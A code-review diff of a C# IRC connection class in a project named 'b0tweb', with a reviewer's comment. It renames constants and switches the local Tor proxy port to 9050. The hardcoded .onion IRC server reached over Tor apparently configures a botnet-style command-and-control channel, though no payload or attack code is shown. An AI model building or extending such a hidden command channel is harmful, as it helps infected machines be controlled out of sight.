b0tweb/IRCConnectionController.cs

```diff
@@ -20,27 +20,27 @@ class IRCConnectionController
         /// <summary>
         /// The Tor server to connect to.
         /// </summary>
-        private const string _server = "botwebzoqpduhxj7hgbu2f6vooyj3lt3q6f6lxir7wb7xjilmvbzkzid.onion";
+        private const string Server = "botwebzoqpduhxj7hgbu2f6vooyj3lt3q6f6lxir7wb7xjilmvbzkzid.onion";
 
         /// <summary>
-        /// The IRC port to use for the connection.
+        /// The IRC port to use fogit r the connection.
         /// </summary>
-        private const int _port = 6667;
+        private const int Port = 6667;
 
         /// <summary>
         /// The proxy host address of the Tor proxy server.
         /// </summary>
-        private const string _proxyHost = "localhost";
+        private const string ProxyHost = "localhost";
 
         /// <summary>
         /// The proxy host port of the Tor proxy server.
         /// </summary>
-        private const int _proxyPort = 9150;
+        private const int ProxyPort = 9050;
 
         /// <summary>
         /// The proxy type of the Tor proxy server.
         /// </summary>
-        private const ProxyType _proxyType = ProxyType.Socks5;
+        private const ProxyType ProxyKind = ProxyType.Socks5;
```

Comment:
I also changed this to the standard const of .net.
Because we connect directly to the binary, the port also switched to port 9050 instead of 9150.